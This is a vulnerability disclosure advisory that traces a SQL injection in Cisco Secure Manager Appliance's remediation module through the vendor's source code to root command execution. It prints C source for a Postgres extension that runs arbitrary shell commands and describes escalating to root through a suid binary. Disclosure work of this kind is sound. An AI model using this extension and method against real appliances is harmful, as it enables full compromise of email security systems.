# SSD Advisory – Cisco Secure Manager Appliance remediation_request_utils SQL Injection Remote Code Execution
November 14, 2022 [SSD Disclosure / Technical Lead](https://ssd-disclosure.com/author/noamr/) [Uncategorized](https://ssd-disclosure.com/category/uncategorized/)
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Secure Manager Appliance and Cisco Email Security Appliance. Authentication as a high-privileged user is required to exploit this vulnerability.
The specific flaw exists within the `remediation_request_utils` module. The issue results from the lack of proper validation of user-supplied data, which can result in SQL injection. An attacker can leverage this vulnerability to execute code in the context of `root`.
**Note:** [Another vulnerability was published alongside this one](https://ssd-disclosure.com/ssd-advisory-cisco-secure-manager-appliance-jwt_api_impl-hardcoded-jwt-secret-elevation-of-privilege). These vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit the other vulnerability. A Low level privileges user can use the combination of the two vulnerabilities to receive full admin privileges on an affected system.
An independent security researcher has reported this to the SSD Secure Disclosure program.
**Technical Analysis**
The remediation functionality is only available to users that have one of the following roles: `ADMIN`, `EMAIL_ADMIN`, or `CLOUD_ADMIN`, however since we can impersonate any user we can obtain a token for the `admin` account.
The entry point for the vulnerability may be found in the `process_POST` method. The method loads [*1*] the `remediation_data` object from the body of the post request. The `batch_id` is obtained from the `remediation_data` object if present, and it is used to create [*3*] the `record` object. Finally, the `record` object is passed to the `store_mor_details` method indirectly via the `remediation_request_records` object.
def process_POST(self, uri_ctx):
post_data = uri_ctx.request_body
if not post_data:
return uri_handler.URI_Response(None, httplib.BAD_REQUEST, CONSTANTS.NO_CRITERIA)
remediation_data = json.loads(post_data, object_hook=stringyfy)['data'] # 1
except (SyntaxError, ValueError, KeyError):
return uri_handler.URI_Response(None, httplib.BAD_REQUEST, CONSTANTS.MALFORMED_CRITERIA)
initiated_username = uri_ctx.user_name
if not initiated_username:
initiated_username = remediation_data[CONSTANTS.INITIATED_USERNAME]
if not remediation_data.get(CONSTANTS.INITIATED_TIME):
remediation_data[CONSTANTS.INITIATED_TIME] = int(time.time())
batch_id = remediation_data.get(CONSTANTS.BATCH_ID) # 2
if not batch_id:
batch_id = generate_batch_id(initiated_username, remediation_data[CONSTANTS.INITIATED_TIME])
remediation_data[CONSTANTS.BATCH_ID] = batch_id
batch_info_record = create_batch_info_record(remediation_data)
batch_name = remediation_data[CONSTANTS.BATCH_NAME]
message_details = remediation_data[CONSTANTS.REMEDIATION_MESSAGE_DETAILS]
remediation_records = []
for remediation_item in message_details:
record = create_message_details_record(remediation_item, batch_id) # 3
# ...
# ...
remediation_request_records = {CONSTANTS.BATCH_INFO_RECORD: batch_info_record,
self.msgs_db_client.store_mor_details(remediation_request_records, True) # 4
The `store_mor_details` method is an RPC wrapper that calls [*5*] the `write_mor_details_to_buffer` method.
def store_mor_details(self, remediation_data, immediate_msg_write=False):
return msgs_db_utils.write_mor_details_to_buffer(remediation_data, immediate_msg_write) # 5
The `write_mor_details_to_buffer` method uses the `record` object generated earlier as a parameter to call [*6*] the `get_formatted_mor_record` method and then calls [*7*] the `mor_details_buffer_writer` with the result.
def write_mor_details_to_buffer(remediation_data, immediate_msg_write=False):
if remediation_data:
formatted_mor_records = [ get_formatted_mor_record(record) for record in remediation_data.get(remediation_consts.REMEDIATION_RECORDS) ] # 6
formatted_mor_batch_records = [
msgs_db_handler = msgs_db_updater.get_msgs_db_handler()
msgs_db_handler.mor_details_buffer_writer(formatted_mor_records, immediate_msg_write) # 7
msgs_db_handler.mor_batch_details_buffer_writer(formatted_mor_batch_records, immediate_msg_write)
The `get_formatted_mor_record` formats the fields for the INSERT query that will be executed later. Some fields are sanitized, however the `batch_id` field is embedded [*8*] into the query without any sanitization.
def get_formatted_mor_record(mor_data):
(batch_id, mid, subject, from_addrs, rcpts, ip, message_id, attempts, status, sent_at) = mor_data
record = "('%s', %s, '%s'" % (batch_id, mid, _get_sanitized_record_field(subject)) # 8
record = "%s, '%s', '%s', '%s', '%s', '%s', '%s', '%s')" % (record, _get_sanitized_record_field(from_addrs),
_get_sanitized_record_field(rcpts), ip, _get_sanitized_record_field(message_id), attempts, status, sent_at)
return record
The `mor_details_buffer_writer` method is later called to execute the query. The method calls [*9*] the `insert_mor_details` method with the provided parameters.
def mor_details_buffer_writer(self, records, immediate_msg_write=False):
if not self.db_full and len(records) < self._limit:
conn = self._get_connection()
if immediate_msg_write and conn is not None:
self.insert_mor_details(conn, records) # 9
The `insert_mor_details` method fully constructs [*10*] the query and then it executes [*11*] it.
def insert_mor_details(self, conn, bulk_records):
query_str = msgs_db_query.get_mor_details_bulk_insert_query(bulk_records) # 10
msgs_db_defs.log_trace('Query string for mor_details: %s' % (query_str,))
self.query(conn, query_str) # 11
except (coro_postgres.QueryError, coro_postgres.InternalError), err:
msgs_db_defs.log('Database insertion error %s' % (
except coro_postgres.ConnectionClosedError, err:
msgs_db_defs.log('Postgres connection closed. Reason: %s' % (err,))
self.db_empty = False
msgs_db_defs.log('%s records inserted' % (len(bulk_records),))
The query is constructed by calling the `get_mor_details_bulk_insert_query`, which internally calls [*12*] the `_get_records_insert_query` method.
def get_mor_details_bulk_insert_query(bulk_records):
return _get_records_insert_query(msgs_db_defs.MOR_DETAILS_TABLE_COLUMNS, bulk_records, msgs_db_defs.MOR_DETAILS_TABLE) # 12
Finally, the `_get_records_insert_query` method uses the given parameters to construct [*13*] the query without any further sanitization.
def _get_records_insert_query(keys, values, table_name):
keys = (', ').join(keys)
values = (', ').join(values)
return 'INSERT INTO %s (%s) VALUES %s' % (table_name, keys, values) # 13
As the SQL injection happens in the context of the `pgsql` user, there are multiple methods to execute arbitrary commands on the target system. The method used in the exploit is to write to disk and load a postgres extension and to later call it’s defined function `pg_system` to execute arbitrary commands. To obtain `root` on the target server, there is a `suid` binary available named `runas` which allows any user to run commands as any other user by providing the desired username as the first parameter. The code for the postgres extension may be found below.
#include <stdlib.h>
#include <postgres.h>
#include <fmgr.h>
Datum pg_system(PG_FUNCTION_ARGS) {
text *commandText = PG_GETARG_TEXT_P(0);
int32 commandLen = VARSIZE(commandText) - VARHDRSZ;
char *command = (char *)palloc(commandLen + 1);
int32 result = 0;
memcpy(command, VARDATA(commandText), commandLen);
command[commandLen] = 0;
result = system(command);
**Vendor Response**
The vendor has issued a patch for the vulnerability as part of its patches released on the 11th of November 2022 for the affected platform – https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esasmawsa-vulns-YRuSW5mD